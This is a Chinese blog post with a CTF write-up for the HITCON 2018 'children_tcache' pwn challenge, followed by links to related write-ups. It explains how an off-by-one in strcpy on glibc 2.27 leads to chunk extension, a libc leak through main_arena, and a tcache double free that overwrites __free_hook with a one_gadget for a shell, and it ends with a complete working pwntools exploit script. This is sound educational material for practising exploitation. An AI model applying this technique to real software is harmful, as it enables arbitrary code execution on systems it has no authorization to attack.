HITCON_2018_children_tcache

最新推荐文章于 2023-08-29 16:28:20 发布
最新推荐文章于 2023-08-29 16:28:20 发布
阅读量521 收藏
点赞数 1
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/u014377094/article/details/123623991
版权

惯例checksec一下

ida打开还是熟悉的malloc,free和show模块

strcpy存在off-by-one漏洞

思路还是创建两个大于tcache大小的chunk,中间夹一个tcache可存储大小的chunk。

通过extend再改变unsortedbin头位置泄露mainarena位置找到libc基址,最后doublefree实现对hook的更改。

add(0x410,b'a')
add(0xe8,b'a')
add(0x4f0,b'a')
add(0x60,b'a')

free(0)

free(1)

 

for i in range(0,6):
	add(0xe8-i,b'k'*(0xe8-i))
	free(0)
add(0xe8,b'k'*0xe0+p64(0x510))

free(2)

extend后,大小变为0xa11

 

add(0x410,'leak libc')
show(0)

leak_addr = u64(p.recv(6).ljust(8,b'\x00'))
log.info("leak_addr:"+hex(leak_addr))
libc_base = leak_addr -0x3ebca0
log.info("leak_base:"+hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']

unsortedbin头与tcachebin重合

show0,泄露mainarena地址

这里mainarena偏移有个计算,ca0这个就是上图看见的mainarena+96,000是本地查看的libc基址。

 

最后doublefree

add(0x60,b'getshell')
free(0)
free(2)
add(0x60,p64(free_hook))
add(0x60,p64(free_hook))

使tcachebin指向了freehook。

利用onegadget获得execve

add(0x60,p64(onegadget))
free(0)

p.interactive()

填入freehook。最后free0,调用execve。

exp

from pwn import *
context(log_level='debug',arch='amd64')
elf = ELF("./program")
p = process('./program')
libc = ELF("./libc-2.27.so")

def add(size, content):
	p.recvuntil("Your choice: ")
	p.sendline('1')
	p.recvuntil("Size:")
	p.sendline(str(size))
	p.recvuntil("Data:")
	p.send(content)

def free(index):
	p.recvuntil("Your choice: ")
	p.sendline('3')
	p.recvuntil("Index:")
	p.sendline(str(index))

def show(index):
	p.recvuntil("Your choice: ")
	p.sendline('2')
	p.recvuntil("Index:")
	p.sendline(str(index))

add(0x410,b'a')
add(0xe8,b'a')
add(0x4f0,b'a')
add(0x60,b'a')

free(0)

free(1)
for i in range(0,6):
	add(0xe8-i,b'k'*(0xe8-i))
	free(0)
add(0xe8,b'k'*0xe0+p64(0x510))

free(2)
add(0x410,'leak libc')
show(0)

leak_addr = u64(p.recv(6).ljust(8,b'\x00'))
log.info("leak_addr:"+hex(leak_addr))
libc_base = leak_addr -0x3ebca0
log.info("leak_base:"+hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']

add(0x60,b'getshell')
free(0)
free(2)
add(0x60,p64(free_hook))
add(0x60,p64(free_hook))
onegadget = libc_base + 0x4f322#0x4f3c2
log.info("onegadget:"+hex(onegadget))
log.info("free_hook"+hex(free_hook))
add(0x60,p64(onegadget))

free(0)

p.interactive()

Marx_ICB
关注
BUUCTF-PWN刷题记录-5(Tcache
weixin_44145820的博客
04-13 1574
目录ciscn_2019_final_3[V&N2020 公开赛]easyTHeap ciscn_2019_final_3 只有添加和删除两个功能 限制了申请的大小,最大为0x78,意味着chunk最大为0x80,添加完可以泄露堆上的地址 free之后没有置空,可以double free 题目分析差不多就这样,下面是漏洞利用: 先申请一个大小为0x78的heap[0],记录下返回地...
houseoforange_hitcon_2016
fayinq的博客
04-07 345
houseoforange_hitcon_2016 先检查保护 保护全开 FSOP:对于_IO_FILE_plus结构体的利用 首先,在分析这个题目之前,我们需要知道两个知识点,一个是_IO_FILE_plus,一个是FSOP _IO_FILE_PLUS _IO_FILE_plus是ptmalloc中定义的一种结构体,他决定了很多东西,先在gdb里面查看一眼 在此,我们就用本次题目中会使用到的_IO_list_all结构体来作为参考。 _IO_FILE_plus 主要是由两个部分组成,其中一个是_IO
hitcon_2018_children_tcache
qq_62887641的博客
08-29 190
使用off by null 堆合并,然后使用tcache的doublefree控制fd,然后控制。add可以申请0x2000大小的chunk(一般我们也用不了那么大x。并且有个memset将chunk内的内容全部设置成。剩下补充在exp详情,(并且再详细也会配图x。strcpy复制完之后,字符串末尾添加。dele 这里没有uaf,清空指针了。show这里就是打印指针指向的内容。本题是部署在libc-2.27。,所以我们可以溢出一个。然后getshell。
hitcon_2018_children_tcachetcache off-by-null,另一种doublefree)
m0_51251108的博客
11-06 564
hitcon_2018_children_tcache: 显然保护全开 逆向分析: add函数: 漏洞在这个strcpy函数上 delete函数: show函数:
hitcon_2018_children_tcache(UNsortattack,chunk extend,house of orange,srop)
weixin_61283545的博客
09-02 237
复现了一下师傅的exp这个题目的关键在于strcpy会溢出\x00我们就要利用它来清空chunk2的prev位达到chunk extend的效果,值得注意的是这道题free的时候指针是被清空了的注意每次malloc后的id,比如在循环阶段abac型构造的堆段,我们free a,b之后作为unsortbin的a和铺垫的bin的b被free后,我们id 0,1的chunk也就消失了,所以我们循环清空prev时申请回来的id是0,相同的原理我们最后才能构造一个double c同时指向一个堆段。
houseoforange_hitcon_2016(House of orange, unsorted bin attack,FSOP)
weixin_44145820的博客
04-27 1683
目录题目分析漏洞利用Exp 题目分析 只有添加,显示,编辑三个功能,没有删除 添加函数,最多只能添加四次,每次添加会依次执行malloc(0x10),malloc(name_size),calloc(8) House结构体如下 在编辑函数中,可以进行堆溢出,因为House没有把name的size保存下来 编辑次数最多为3 漏洞利用 Exp ...
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
HITCON GIRLS是一个以女性为主体的信息安全社区,致力于推广信息安全学习和提升科技行业的包容性。 【HITCON GIRLS】 HITCON GIRLS社区通过组织各种主题的读书会,鼓励女性成员深入学习信息安全知识和技术,促进...
BMZCTF hitcon_2017_ssrfme
qq_26243045的博客
11-26 722
考点:perl脚本open命令执行 打开题目显示如下代码 将GET请求到的数据保存在我们自定义的文件名当中。 给url参数传递/可以查看根目录下的内容 Perl的open函数执行会执行给open函数所传递的文件名参数中的系统命令,但是前提是这个文件名是需要存在的。 这道题因为文件名是可以控制的,所以就先生成一个以读取flag命令命名的文件 然后使用file协议去读取文件 访问即可获得flag ...
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2368
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
WCAD.SHX
05-20
使用方法:拷贝到Auto CAD的Fonts下
地球hook4.0.1开源
05-20
地球hook4.0.1开源
安卓期末大作业-Android图书管理应用源代码(高分项目)
05-20
安卓期末大作业—Android图书管理应用源代码(高分项目),个人经导师指导并认可通过的高分设计项目,评审分98分,项目中的源码都是经过本地编译过可运行的,都经过严格调试,确保可以运行!主要针对计算机相关专业的正在做大作业、毕业设计的学生和需要项目实战练习的学习者,资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、使用需求,如果有需要的话可以放心下载使用。 安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—Android图书管理应用源代码(高分项目)安卓期末大作业—And
2021年华数杯数学建模竞赛优秀论文
05-20
本文以电动汽车销售策略为研究对象,综合运用层次分析法、决策树、皮尔逊相关性分析、BP神经网络及粒子群优化等多种方法,深入探讨了影响目标客户购买电动汽车的因素及相应的销售策略。研究结果显示,客户对合资品牌电动汽车的满意度为78.0887,对自主品牌的满意度为77.7654,对新势力品牌的满意度为77.0078。此外,研究还发现电池性能、经济性、城市居住年限、居住区域、工作单位、职务、家庭年收入、个人年收入、家庭可支配收入、房贷占比、车贷占比等因素对电动汽车销量存在显著影响。通过BP神经网络对目标客户的购买意愿进行预测,其预测数据拟合程度超过80%,且与真实情况高度接近。基于研究结果,本文为销售部门提出了提高销量的建议,包括精准定位尚未购买电动汽车的目标客户群体,制定并实施更具针对性的销售策略,在服务难度提升不超过5%的前提下,选择实施最具可行性和针对性的销售方案。 在研究过程中,层次分析法被用于对目标客户购买电动汽车的影响因素进行系统分析与评价;决策树模型则用于对缺失数据进行预测填充,以确保数据的完整性和准确性;BP神经网络用于预测目标客户的购买意愿,并对其预测效果进行评估;粒子群优化算法对BP神经网络模型进行优化,有效提升了模型的稳定性和预测能力;皮尔逊相关性分析用于探究不同因素与购买意愿之间的相关性。通过这些方法的综合运用,本文不仅揭示了影响电动汽车销量的关键因素,还为销售策略的优化提供了科学依据。
cmd-bat-批处理-脚本-文件归类整理器(当前目录版).zip
05-20
cmd-bat-批处理-脚本-文件归类整理器(当前目录版).zip
cmd脚本-bat批处理-抛弃路径尾部指定层次的字符串.zip
最新发布
05-20
cmd脚本-bat批处理-抛弃路径尾部指定层次的字符串.zip
【数据库管理】MySQL数据库选择方法详解:命令行与PHP脚本操作指南
05-20
内容概要:本文详细介绍了如何在不同场景下选择 MySQL 数据库的方法。首先,解释了通过命令提示窗口使用 USE 语句选择数据库的基本语法和步骤,包括直接在 mysql> 提示符下输入 USE database_name; 来切换数据库,以及通过命令行参数 -D 直接连接并选择数据库的方式。其次,介绍了使用 PHP 脚本选择 MySQL 数据库的方法,重点讲解了 mysqli_select_db 函数的使用方法,给出了完整的 PHP 示例代码,展示了如何建立 MySQL 连接、选择数据库并关闭连接。 适合人群:有一定编程基础,特别是对数据库操作有一定了解的开发人员或运维人员。 使用场景及目标:①需要在命令行环境下进行数据库管理或数据操作的技术人员;②使用 PHP 开发 Web 应用程序时,需要与 MySQL 数据库交互的开发人员;③希望通过编程方式自动化数据库选择流程的开发人员。 阅读建议:对于初学者来说,建议先掌握 MySQL 命令行工具的基本用法,再逐步学习 PHP 数据库连接的相关知识。在实际应用中,应确保所选数据库存在且权限正确,避免因数据库不存在或权限不足导致的操作失败。
esp-idf-extension.vsix zip
05-20
解压
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值